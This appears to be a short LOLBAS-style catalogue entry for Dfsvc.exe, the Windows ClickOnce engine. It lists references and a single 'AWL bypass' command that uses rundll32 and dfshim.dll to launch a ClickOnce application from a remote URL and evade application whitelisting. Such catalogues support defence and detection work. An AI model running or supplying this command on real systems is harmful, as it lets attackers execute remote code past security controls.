Dfsvc.exe

ClickOnce engine in Windows used by .NET


Paths:


Resources:
https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe

Acknowledgement:
Casey Smith - @subtee


Detection:



AWL bypass

Executes a ClickOnce application from a URL
rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Usecase: Use binary to bypass application whitelisting
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre: T1127